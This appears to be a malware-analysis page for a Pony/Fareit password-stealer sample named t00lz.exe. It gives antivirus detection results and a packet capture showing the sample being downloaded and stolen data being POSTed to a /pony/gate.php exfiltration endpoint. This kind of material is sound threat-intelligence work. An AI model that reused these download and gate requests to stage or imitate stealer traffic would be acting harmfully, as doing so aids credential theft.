Attachment: t00lz
Date added: November 2, 2016 2:59 am
Added by: admin
File size: 4 KB
SHA256: 09002c686e358799a9d732f4483a31a858bb140a3dfd59df54b1d449d2f8122b
File name: t00lz.exe
Detection ratio: 50 / 55
Analysis date: 2016-11-02 02:52:48 UTC
| Antivirus | Result | Update |
|---|---|---|
| Ad-Aware | Gen:Variant.Razy.11684 | 20161102 |
| AegisLab | Troj.W32.Gen.lIb0 | 20161102 |
| AhnLab-V3 | Trojan/Win32.Tepfer.N2144687522 | 20161101 |
| Antiy-AVL | Trojan[:HEUR]/Win32.Unknown | 20161102 |
| Arcabit | Trojan.Razy.D2DA4 | 20161102 |
| Avast | Win32:Evo-gen [Susp] | 20161102 |
| Avira (no cloud) | TR/PSW.Fareit.iloen | 20161101 |
| Baidu | Win32.Trojan-PSW.Fareit.a | 20161101 |
| BitDefender | Gen:Variant.Razy.11684 | 20161102 |
| CAT-QuickHeal | PWS.Fareit.E3 | 20161101 |
| ClamAV | Win.Trojan.Fareit-403 | 20161101 |
| Comodo | TrojWare.Win32.PWS.Fareit.GS | 20161102 |
| CrowdStrike Falcon (ML) | malicious_confidence_98% (W) | 20161024 |
| Cyren | W32/Tepfer.R.gen!Eldorado | 20161102 |
| DrWeb | Trojan.PWS.Stealer.1932 | 20161102 |
| ESET-NOD32 | a variant of Win32/PSW.Fareit.A | 20161101 |
| Emsisoft | Gen:Variant.Razy.11684 (B) | 20161102 |
| F-Prot | W32/Tepfer.R.gen!Eldorado | 20161102 |
| F-Secure | Gen:Variant.Razy.11684 | 20161102 |
2016-11-01 21:22:37.170895 IP 192.168.1.102.51077 > 216.34.181.96.80: Flags [P.], seq 0:298, ack 1, win 64240, length 298: HTTP: GET /pony/t00lz.exe HTTP/1.1
GET /pony/t00lz.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: t00lz.sourceforge.net
Connection: Keep-Alive
2016-11-01 21:22:37.225484 IP 192.168.1.102.51077 > 216.34.181.96.80: Flags [.], ack 2921, win 64240, length 0
2016-11-01 21:22:45.130245 IP 192.168.1.102.51078 > 216.34.181.96.80: Flags [P.], seq 0:274, ack 1, win 64240, length 274: HTTP: POST /pony/gate.php HTTP/1.0
POST /pony/gate.php HTTP/1.0
Host: t00lz.sourceforge.net
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 338
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Original article: Razy/Fareit Variant Pony Trojan Downloader Malware FULL PCAP File Download Traffic Sample gate.php.